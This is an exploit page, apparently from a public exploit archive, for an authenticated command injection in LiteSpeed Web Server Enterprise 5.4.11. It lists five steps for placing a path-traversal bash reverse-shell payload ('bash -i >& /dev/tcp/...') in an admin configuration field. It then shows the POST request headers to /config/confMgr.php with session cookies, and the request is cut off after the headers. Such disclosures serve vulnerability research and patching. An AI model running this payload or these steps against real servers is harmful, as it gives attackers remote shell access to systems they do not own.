LiteSpeed Web Server Enterprise 5.4.11 Command Injection

LiteSpeed Web Server Enterprise version 5.4.11 suffers from an authenticated remote command injection vulnerability.

MD5 | 4ccb7816f0ee2cec9578a104021a7947

# Exploit Title: LiteSpeed Web Server Enterprise 5.4.11 - Command Injection (Authenticated)
# Date: 05/20/2021
# Exploit Author: cmOs - SunCSR
# Vendor Homepage:
# Software Link:
# Version: 5.4.11
# Ubuntu/Kali Linux

Step 1: Log in to the dashboard using the Administrator account.
Step 2 : Access Server Configuration > Server > External App > Edit
Step 3: Set "Start By Server *" Value to "Yes (Through CGI Daemon)
Step 4 : Inject payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'" to "Command" value
Step 5: Graceful Restart


POST /config/confMgr.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 505
Connection: close
Cookie: LSWSWEBUI=85fa7ba9b37d18d57e41e092a2a2a61f;
lsws_uid=j%2FsI8GRiKBc%3D; lsws_pass=c7pC2izvdbQ%3D
Upgrade-Insecure-Requests: 1


Related Posts